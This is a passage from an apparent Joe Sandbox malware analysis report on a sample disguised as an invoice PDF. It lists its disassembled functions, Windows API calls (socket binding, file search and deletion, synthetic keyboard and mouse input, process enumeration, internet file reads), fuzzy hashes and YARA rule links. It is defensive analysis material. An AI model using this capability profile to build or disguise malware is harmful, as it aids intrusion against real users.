WSAGetLastError.WSOCK32 ref: 0049130D
closesocket.WSOCK32(00000000), ref: 0049133C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: f2901c0e9320d57d6022956eb0eba1e4c89fefc9eb384b579d7bac31061d82de
Instruction ID: 36fb13bde51371ff65b9a3fbae29feb4be3297c3ac66fa839b86cba43553d432
Opcode Fuzzy Hash: f2901c0e9320d57d6022956eb0eba1e4c89fefc9eb384b579d7bac31061d82de
Instruction Fuzzy Hash: A64162316001019FDB10EF64C484B6ABBE5BF46318F1881ADD8569F3E6C779ED81CBA5

Function 0044B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044B9D4
_free.LIBCMT ref: 0044B9F8
_free.LIBCMT ref: 0044BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004B3700), ref: 0044BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0044BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004E1270,000000FF,?,0000003F,00000000,?), ref: 0044BC36
_free.LIBCMT ref: 0044BD4B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 947d3d152d4689eb1bfec6cf6bdd486f82cd9c713d1e7efe0a6840d044974208
Instruction ID: e9597cbb70ea9c676cba07968464c17cb60811c319e0a9a9fe6d1cced2f7fdb4
Opcode Fuzzy Hash: 947d3d152d4689eb1bfec6cf6bdd486f82cd9c713d1e7efe0a6840d044974208
Instruction Fuzzy Hash: A5C11971A042459FEB209F6A8C81AAA7BB8EF45314F1441AFE990EB352D738DD4187D8

Function 0047D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00413AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00413A97,?,?,00412E7F,?,?,?,00000000), ref: 00413AC2

Part of subcall function 0047E199: GetFileAttributesW.KERNEL32(?,0047CF95), ref: 0047E19A

FindFirstFileW.KERNEL32(?,?), ref: 0047D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0047D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0047D481
FindClose.KERNEL32(00000000), ref: 0047D498
FindClose.KERNEL32(00000000), ref: 0047D4A1

Strings

\*.*, xrefs: 0047D3F2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 57ae06a0dd8004268ea9bdfae86042c365bc1a8f5aad35081478acb74a368255
Instruction ID: 881502f683e4a739534d3d2421454e492770a406ec2f3b67fa0c6386e1b0b148
Opcode Fuzzy Hash: 57ae06a0dd8004268ea9bdfae86042c365bc1a8f5aad35081478acb74a368255
Instruction Fuzzy Hash: 2C31B2714183449BC300EF61C8918EF77E8AE91314F448E1FF4D552191EB38AA49C76B

Function 0044E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0044E645

Strings

1#IND, xrefs: 0044F83D
1#SNAN, xrefs: 0044F844
1#INF, xrefs: 0044F852
1#QNAN, xrefs: 0044F84B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 55d8a0112e7536801a80e2d2face1bd2a77649d72c9dacf9f5349b32c2276289
Instruction ID: 7f2a59f8be7e269ccb82b669bf2442bb820b17bf4250837d9df762e4fa5cdb0f
Opcode Fuzzy Hash: 55d8a0112e7536801a80e2d2face1bd2a77649d72c9dacf9f5349b32c2276289
Instruction Fuzzy Hash: F4C24872E046288FEB25CE299D407EAB7B5FB48305F1441EBD80DE7241E778AE858F45

Function 0048648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004864DC
CoInitialize.OLE32(00000000), ref: 00486639
CoCreateInstance.OLE32(004AFCF8,00000000,00000001,004AFB68,?), ref: 00486650
CoUninitialize.OLE32 ref: 004868D4

Strings

.lnk, xrefs: 004864BA, 00486524, 004865E0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: ef84fec67bd86765a6c5f38219e6ba74d6b63137264d422b7ad900ff58601a37
Instruction ID: bd6775c1ad53ba9417aa207dd946af9fa3ab70a9163365b3164009be91aae2f7
Opcode Fuzzy Hash: ef84fec67bd86765a6c5f38219e6ba74d6b63137264d422b7ad900ff58601a37
Instruction Fuzzy Hash: 5ED15B71508301AFC304EF25C891AABB7E8FF98708F10496EF5958B291EB34ED45CB96

Function 004922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 004922E8

Part of subcall function 0048E4EC: GetWindowRect.USER32(?,?), ref: 0048E504

GetDesktopWindow.USER32 ref: 00492312
GetWindowRect.USER32(00000000), ref: 00492319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00492355
GetCursorPos.USER32(?), ref: 00492381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004923DF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: a8a07764a6c0faaf334571e613809a976c782fb92ab1b4b6bfa29b7e8829307b
Instruction ID: bda8f7bd6a7f8d7156a8f373fab8ae418e43ecd8c114459a1b6a3ef742074e25
Opcode Fuzzy Hash: a8a07764a6c0faaf334571e613809a976c782fb92ab1b4b6bfa29b7e8829307b
Instruction Fuzzy Hash: C931E672505315AFCB20DF25C845B5B7BE9FF89314F00092EF98597181DB78E908CB95

Function 00489B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00489B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00489C8B

Part of subcall function 00483874: GetInputState.USER32 ref: 004838CB
Part of subcall function 00483874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00483966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00489BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00489C75

Strings

*.*, xrefs: 00489B5D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 367d4a8f4d6948cc5af5ae78f15892c60279bf9b4409eb076b098e4fb9c92901
Instruction ID: 49a0db4858c119d05f826541f64bd1c1de7c45d6420c29d4adb679eba4af7771
Opcode Fuzzy Hash: 367d4a8f4d6948cc5af5ae78f15892c60279bf9b4409eb076b098e4fb9c92901
Instruction Fuzzy Hash: 2941B3719006099FDF15EF64C889AEE7BF4FF05310F24445BE805A2291EB39AE84CF68

Function 0042997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00429A4E
GetSysColor.USER32(0000000F), ref: 00429B23
SetBkColor.GDI32(?,00000000), ref: 00429B36

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 4ef140965a7e9bddf5908c3ae7c646a6ee2ee3860e67d70e09dad162ffcfb65a
Instruction ID: f33e99569ca7314aa580f14835c56f0e6487d477b6a2df7b9c28cc2b4582c339
Opcode Fuzzy Hash: 4ef140965a7e9bddf5908c3ae7c646a6ee2ee3860e67d70e09dad162ffcfb65a
Instruction Fuzzy Hash: 45A12D703085A0BEE724AA2DAC98D7B295DEF43358F54411FF402C6792DA2D9D42C27F

Function 00491806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0049304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0049307A
Part of subcall function 0049304E: _wcslen.LIBCMT ref: 0049309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0049185D
WSAGetLastError.WSOCK32 ref: 00491884
bind.WSOCK32(00000000,?,00000010), ref: 004918DB
WSAGetLastError.WSOCK32 ref: 004918E6
closesocket.WSOCK32(00000000), ref: 00491915

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 7e95823b984781d212d0e4ecb6d37d4c6716ace0ec562b3ecb0f5ad93d868c32
Instruction ID: 61dfaf6aaed178368c8f86e4d8af9b38a4c53dc191049b18f6dc8a06e67cc523
Opcode Fuzzy Hash: 7e95823b984781d212d0e4ecb6d37d4c6716ace0ec562b3ecb0f5ad93d868c32
Instruction Fuzzy Hash: 6251B171A00210AFDB10EF24C886F6A7BE5AB45718F04809DF9155F3D3C779ED428BA5

Function 004A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004A1CC0
IsWindowEnabled.USER32 ref: 004A1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 004A1CDB
IsIconic.USER32 ref: 004A1CE9
IsZoomed.USER32 ref: 004A1CF7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6e5d71aa7a4d9ef380b255c1eeea343da12b459512fefac7ffe15549fde06518
Instruction ID: 1b582f708d5333429c38d7c272864bafcb15e379d6e87731d89e9730ec1cd216
Opcode Fuzzy Hash: 6e5d71aa7a4d9ef380b255c1eeea343da12b459512fefac7ffe15549fde06518
Instruction Fuzzy Hash: A52197317406115FE7208F1AD884B677BE5EFA6325F19806EE846CB361C779EC42CB98

Function 00418060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 004183E8
VUUU, xrefs: 00455DF0
VUUU, xrefs: 0041843C
ERCP, xrefs: 0041813C
VUUU, xrefs: 004183FA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: a47f74887cdec0ca62775d863d3a2791c6fad9aba549954cb7e236fff54248cf
Instruction ID: dcac04e15f16dcd5f4ad99a31405ad59be15cef23d9735500cacf7078ae58de4
Opcode Fuzzy Hash: a47f74887cdec0ca62775d863d3a2791c6fad9aba549954cb7e236fff54248cf
Instruction Fuzzy Hash: 00A28C70A0061ACBDF24CF58C9507EEB7B1AB54311F25819BEC15A7382EB389DC5CB99

Function 00478298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004782AA

Strings

(, xrefs: 004782F0
tbM, xrefs: 004784F4
|, xrefs: 004782DA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: lstrlen
String ID: ($tbM$|
API String ID: 1659193697-2959561728
Opcode ID: a79838a4e8080e57b76a01666f854b285c0cc2521bef5fe824f43a205b656022
Instruction ID: 26f52a6da03ec17fb982b3d23b80084894bb90065f382fbebe4ab9c652514ebc
Opcode Fuzzy Hash: a79838a4e8080e57b76a01666f854b285c0cc2521bef5fe824f43a205b656022
Instruction Fuzzy Hash: 2C324674A007059FCB28CF19C484AAAB7F0FF48710B15C56EE89ADB7A1EB74E941CB44

Function 0049A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0049A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0049A6BA

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Process32NextW.KERNEL32(00000000,?), ref: 0049A79C
CloseHandle.KERNEL32(00000000), ref: 0049A7AB

Part of subcall function 0042CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00453303,?), ref: 0042CE8A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: db950035c9e26678fd331b31d1dd48744123a6e887133a08f96bee5bb3b21c4a
Instruction ID: df926239ac5d77136032d197bdc39203963052ccd754074aa1f0b18be269c5cb
Opcode Fuzzy Hash: db950035c9e26678fd331b31d1dd48744123a6e887133a08f96bee5bb3b21c4a
Instruction Fuzzy Hash: 0A518171508300AFC710EF25C886A5BBBF8FF89758F40492EF58597251EB34E944CB96

Function 0047AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0047AAAC
SetKeyboardState.USER32(00000080), ref: 0047AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0047AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0047AB88

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1e88283fa3b960101e8e1c967dc627a4e1c5f4b4010cdb7a1c330d9be1e59f62
Instruction ID: d047cb36b58012327e03cf793e2875beafb4bef4af9709bef7950b2e43ec58b9
Opcode Fuzzy Hash: 1e88283fa3b960101e8e1c967dc627a4e1c5f4b4010cdb7a1c330d9be1e59f62
Instruction Fuzzy Hash: E831FB30A40204AEFB25CA65C805BFF7BA6ABC5310F04C21BF289552D1D37CA965C75B

Function 0048CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0048CE89
GetLastError.KERNEL32(?,00000000), ref: 0048CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0048CEFE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: a9c051143c1e3b11bd2e1e4940b97909d37930246d3b9fa34ba0518a3cd32c00
Instruction ID: 7f7814d51e181b2f6b9beb3ab883d1bc04334b89ad5f6d1789026b9788c9685f
Opcode Fuzzy Hash: a9c051143c1e3b11bd2e1e4940b97909d37930246d3b9fa34ba0518a3cd32c00
Instruction Fuzzy Hash: 752192719003059BE730EF55D984BAB77F8EB51354F10482FE64692291D778ED058B68

Function 0047DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00455222), ref: 0047DBCE
GetFileAttributesW.KERNEL32(?), ref: 0047DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0047DBEE
FindClose.KERNEL32(00000000), ref: 0047DBFA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 0d694c7e09d17afecbe423db6a296fda9315c71e712afbfc010a4e8934ba701c
Instruction ID: 09ebdddbf36ce4036177ee0147db7007318ee147bebc28438f175371bef3acbf
Opcode Fuzzy Hash: 0d694c7e09d17afecbe423db6a296fda9315c71e712afbfc010a4e8934ba701c
Instruction Fuzzy Hash: 0DF0A031C209105B92216B78AC4D8EB3BBC9E02334B148B53F83AC21E0EBB45D55869E

Function 00485C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00485CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00485D17
FindClose.KERNEL32(?), ref: 00485D5F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e36e0a4e1c31961f04f98b179e6bd91a7871438ad3ed13ed8da20a99b71f134c
Instruction ID: 17d6ded8bbdfeb055e7ab827c6b7c8d2470d14081125e9846a0701b152a51fdc
Opcode Fuzzy Hash: e36e0a4e1c31961f04f98b179e6bd91a7871438ad3ed13ed8da20a99b71f134c
Instruction Fuzzy Hash: 6251AA346046019FC714DF28C494A9AB7E4FF49318F14895EE95A8B3A1CB38EC45CF95

Function 00442622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0044271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00442724
UnhandledExceptionFilter.KERNEL32(?), ref: 00442731

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
